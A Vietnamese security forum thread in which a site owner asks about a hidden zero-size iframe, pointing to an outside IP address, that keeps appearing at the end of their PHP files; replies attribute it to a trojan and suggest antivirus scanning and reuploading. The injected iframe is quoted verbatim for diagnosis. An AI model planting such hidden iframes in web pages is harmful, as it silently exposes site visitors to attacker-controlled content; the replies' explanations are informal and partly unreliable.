English | Vietnamese
 

banner

[Rule] Nội Quy  [Home] Diễn đàn  [Portal] Portal  
[Members] Danh sách thành viên  [Statistics] Thống kê  [Search] Tìm kiếm  [Reading Room] Phòng đọc 
[Register] Đăng ký   [Login] Đăng nhậphttp  | https  ]
 
Diễn đàn chính Thắc mắc thông thường và căn bản Trojan trong code PHP  XML
  [Hỏi đáp]   Trojan trong code PHP 13/07/2007 10:33:42 (+0700) | #1 | 71012
nobita 2.0
Member
[Minus]    0    [Plus]
Joined: 13/07/2007 12:23:54
Bài gởi: 3
Offline
[Profile] [PM]
Mấy ngày nay không hiểu bị lộ pass FTP hay sao mà cứ mở file PHP nào trong host thì sau ?> luôn có cái này:

Code:
<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>


Mong các anh em có kinh nghiệm phân tích giùm mình cái này với.

Cái này có thể "làm ăn" được gì với server của mình, nó hoạt động thế nào và.... hic, sao cái nào nó cũng vậy cả? smilie
[Up] [Print Copy]
  [Hỏi đáp]   Trojan trong code PHP 13/07/2007 11:07:02 (+0700) | #2 | 71027
[Avatar]
 daudau
Member
[Minus]    0    [Plus]
Joined: 02/09/2006 16:30:39
Bài gởi: 139
Offline
[Profile] [PM]

nobita 2.0 wrote:
Mấy ngày nay không hiểu bị lộ pass FTP hay sao mà cứ mở file PHP nào trong host thì sau ?> luôn có cái này:

Code:
<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>


Mong các anh em có kinh nghiệm phân tích giùm mình cái này với.

Cái này có thể "làm ăn" được gì với server của mình, nó hoạt động thế nào và.... hic, sao cái nào nó cũng vậy cả? smilie 


Đoạn code trên được chèn vào mỗi cuối trang PHP phải ko?
theo mình được biết đây là 1 trojan nó nhiễu vào máy bạn thì nó sẽ tìm những file code PHP, ASP, .NET .... và tự động chèn 1 đoạn code vào. Và khi người khác truy cập vào website của bạn . nó sẽ tự động gởi yêu cầu đến 1 trang khác. trang này có những nội dung ko được lành mạnh ...

Khi bị nhiễm con này rồi, tất cả các chương trình diệt virus như Norton, KasperSky , Zone alam ... Sẽ không được khởi động cùng máy và tự động tắt, nên máy của bạn mặc nhiên sẽ không được bảo vệ.

Đã bị dính con này khoảng 2 tháng trước. ("http://cv138.com.....") smilie) smilie)

Cách diệt của bản thân : sử dụng BKAV bản mới nhất...

Quét xong khởi động lại máy, dùng chương trình quét thông dụng, quét lại 1 lần nữa.

Chúc thành công.

http://vnnshare.com ->>Share Files Online.
http://vnsteam.com ->> Website Design.
[Up] [Print Copy]
  [Hỏi đáp]   Re: Trojan trong code PHP 13/07/2007 18:31:38 (+0700) | #3 | 71113
nobita 2.0
Member
[Minus]    0    [Plus]
Joined: 13/07/2007 12:23:54
Bài gởi: 3
Offline
[Profile] [PM]
Cái này, là code mình chạy trên host nó thế mà smilie

Không hiểu do lộ pass FTP hay sao nữa.

Giờ chủ yếu nó chỉ có trong file index.php mà thôi, mà code nào cũng có, mình dùng host trên nhiều server khác nhau.

Mà cũng không phải là cái chương trình FlashFTP portable có virus không nữa.

Vậy làm sao mình quét đây? Giờ phải load lại toàn bộ code rồi Edit từng file,xong change pass FTP rồi upload lại sao...

[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Chuyển đến: 
 Các thành viên đang hiện diện ở đây 
1 Khách

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2009 © v2009|0107|218|